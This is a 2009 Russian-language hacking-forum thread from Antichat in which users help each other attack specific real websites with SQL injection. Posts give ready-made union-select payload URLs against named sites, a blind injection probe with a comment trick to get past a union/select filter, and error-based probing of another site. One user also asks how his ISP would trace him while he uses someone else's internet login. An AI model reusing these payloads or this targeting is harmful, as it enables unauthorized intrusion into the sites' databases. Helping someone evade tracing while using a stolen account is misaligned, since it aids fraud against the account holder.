Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

13.03.2009, 11:42
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
http://www.theglobalreport.org/print.php?news_id=-100'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+--+
|
|
|

13.03.2009, 11:49
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Ок спасибо
http://www.skai.gr/master_story.php?id=113998%27
Тут возможна иньекция?
Когда подставляю id=-1+union+select+1,2--
То пишет не найдено
|
|
|

13.03.2009, 12:00
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
ветка 4
http://www.skai.gr/master_story.php?id=113998+and+substring(version() ,1,1)=4
Фильтрация union, select
http://www.skai.gr/master_story.php?id=113998+and+substring(version() ,1,1)=4/*select*/
PS. diznt давай уже что-то читать начни, а не только писать, всё это в статьях изложено и трудностей вызывать не должно, ты ведь не первый день на форуме
|
|
|

13.03.2009, 12:46
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Вот еще такой вопрос (правда не по уязвимостям)
Если я к примеру сижу через чужой логин в инете
то как меня вычеслят? ну я имею ввиду что корбина узнает что мол кто то сидит с акка и как они меня будут искать? я понимаю что там у них мой адрес где я проживаю
но все таки интересует как они узнают что с этого адреса где я прожимаю сидели под чужим логином?
|
|
|

13.03.2009, 12:56
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
diznt, с корбиной не знаком, но разве у тебя нет локального адреса, под которым ты заходишь в инет?
|
|
|

13.03.2009, 13:17
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
mailbrush мне нужно подключаться самому
|
|
|

13.03.2009, 13:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Эм.. Но ведь локалка есть? Если да - тебя вычислят по твоему внутреннему айпи.
|
|
|

13.03.2009, 20:58
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
http://tksavelovskiy.ru/actions.html?s=3&a=34073'&page=1
Jokester твои мысли?
|
|
|

13.03.2009, 21:15
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме: 1754802
Репутация:
380
|
|
я хоть и не великий и могучий Jokester но выскажу свое пмсм - не факт что там sql injection или вообше есть какая то уязвимость,никакие логические конструкции не проходят, значит по всей видимости в $_GET['a'] заноситься значения только если $_GET['a'] int (например $_GET['a']=is_numeric($_GET['a']) ? $_GET['a'] :1; ну или что типа такого) , а то что неустановлены индексы у массивов так вполне возможно что mysql_fetch_assoc и потом в скрипте идет обрашения к индексам без проверки их существования. Короче похоже на какую то логическую ошибку в скрипте.
Последний раз редактировалось PaCo; 13.03.2009 в 21:36..
|
|
|

13.03.2009, 22:17
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Если на сайте есть SQL-inj но не выводится ошибка...то как-то можно обойти?
А точнее если вызываю нарушение запроса таким способом 1' то выходит ошибка (похоже SQL класс подключен) ошибка ссылается на WHERE id='1' '
PHP код:
( 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 )
А если прописываю так 1'+or+'2 то запрос нормально выполняется...
Как можно попробовать провести инъекцию?
Последний раз редактировалось Byrger; 13.03.2009 в 22:23..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|